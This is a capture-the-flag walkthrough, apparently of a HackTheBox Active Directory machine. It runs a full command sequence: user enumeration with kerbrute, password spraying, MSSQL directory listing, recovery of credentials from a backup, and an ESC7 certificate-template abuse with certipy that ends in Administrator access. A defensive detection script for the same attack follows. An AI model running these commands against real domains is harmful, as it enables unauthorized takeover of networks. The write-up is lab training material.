53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
49667/tcp open  unknown
49691/tcp open  unknown
49693/tcp open  unknown
49695/tcp open  unknown
49707/tcp open  unknown
53,80,88,135,139,445,464,593,1433,3268,3269,5985,49667,49691,49693,49695,49707
echo "10.129.42.4 manager.htb dc.manager.htb" >> /etc/hosts
All inaccessible.
# enumerate valid domain users with kerbrute
kerbrute userenum -d manager.htb --dc dc.manager.htb /opt/useful/SecLists/Usernames/xato-net-10-million-usernames.txt >> users
# keep only the "VALID USERNAME:" lines and extract the bare username
grep VALID users | awk -F '@' '{print $1}' | awk -F ':' '{print $4}' | tr -d '\t ' >> userlist
# spray: every username tried as a password
crackmapexec smb manager.htb -u userlist -p userlist
This yields an SMB credential:
operator:operator
Try to connect to MSSQL with it:
mssqlclient.py -port 1433 manager.htb/operator:operator@manager.htb -windows-auth
Try to run commands through MSSQL; xp_dirtree lists the contents of the web root:
-- list C:\inetpub\wwwroot one level deep, including files
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
wget manager.htb/website-backup-27-07-23-old.zip
The backup contains a credential:
raven:R4v3nBe5tD3veloP3r!123
Gain initial access with it. The user's privileges:
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeMachineAccountPrivilege is enabled
Most of the time Certify.exe is not present on the target machine; in my case it was not present.
To find vulnerable certificate templates:
./Certify.exe find /vulnerable
pip3 install certipy-ad
certipy find -vulnerable -stdout -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.100.121
There is a glitch with the HTB server; I'm going to reset it later.
certipy find -vulnerable -stdout -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.134.19
or
./Certify.exe find /vulnerable
Run it again:
Search for the ESC7 exploit steps and follow them:
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'
certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn 'administrator@manager.htb'
certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 13
certipy auth -pfx administrator.pfx -username administrator -domain manager.htb -dc-ip 10.129.134.19
Log in with the retrieved credential.
Got Administrator!
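A defender-side companion to the ESC7 chain above, added here and not part of the original writeup: it scans AD CS audit events for the pattern that chain produces (a CA officer or template change made by a non-admin account, then a certificate issued to one account carrying another account's UPN). The event records are constructed samples with simplified field names, and the CA's audit filter must be enabled for these events to be logged at all.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real logs). The event IDs are the standard
# AD CS audit events (4890 certificate manager settings changed, 4891 CA
# configuration entry changed, 4887 certificate issued); the field names are
# simplified assumptions, not the exact Windows event schema.
SAMPLE_EVENTS = [
    {"id": 4890, "time": "2023-07-27T10:00:05", "user": "MANAGER\\raven",
     "detail": "officer rights changed: added MANAGER\\raven"},
    {"id": 4891, "time": "2023-07-27T10:00:20", "user": "MANAGER\\raven",
     "detail": "CertificateTemplates: SubCA enabled"},
    {"id": 4887, "time": "2023-07-27T10:02:00", "user": "MANAGER\\raven",
     "request_id": 13, "template": "SubCA", "upn": "administrator@manager.htb"},
]


def account_name(user):
    """'MANAGER\\raven' -> 'raven': strip the domain prefix, lower-case."""
    return user.rsplit("\\", 1)[-1].lower()


def detect_esc7(events, ca_admins, window=timedelta(minutes=30)):
    """Return alert strings for the ESC7 pattern: a non-CA-admin changing CA
    officer/template settings, and certificates issued whose UPN does not
    match the requesting account (tied to a recent CA change when one exists)."""
    alerts = []
    changes = []  # (time, actor) of CA config changes by non-admin accounts
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        actor = account_name(ev["user"])
        if ev["id"] in (4890, 4891) and actor not in ca_admins:
            changes.append((when, actor))
            alerts.append(f"{ev['time']} {ev['id']}: CA configuration changed "
                          f"by non-admin {actor}: {ev['detail']}")
        elif ev["id"] == 4887:
            upn_user = ev["upn"].split("@", 1)[0].lower()
            if upn_user != actor:  # certificate names someone other than the requester
                recent = sorted({a for t, a in changes if when - t <= window})
                tail = f" (after CA change by {', '.join(recent)})" if recent else ""
                alerts.append(f"{ev['time']} 4887: request {ev['request_id']} "
                              f"({ev['template']}) issued to {actor} with UPN "
                              f"{ev['upn']}{tail}")
    return alerts


if __name__ == "__main__":
    for line in detect_esc7(SAMPLE_EVENTS, ca_admins={"administrator"}):
        print(line)
```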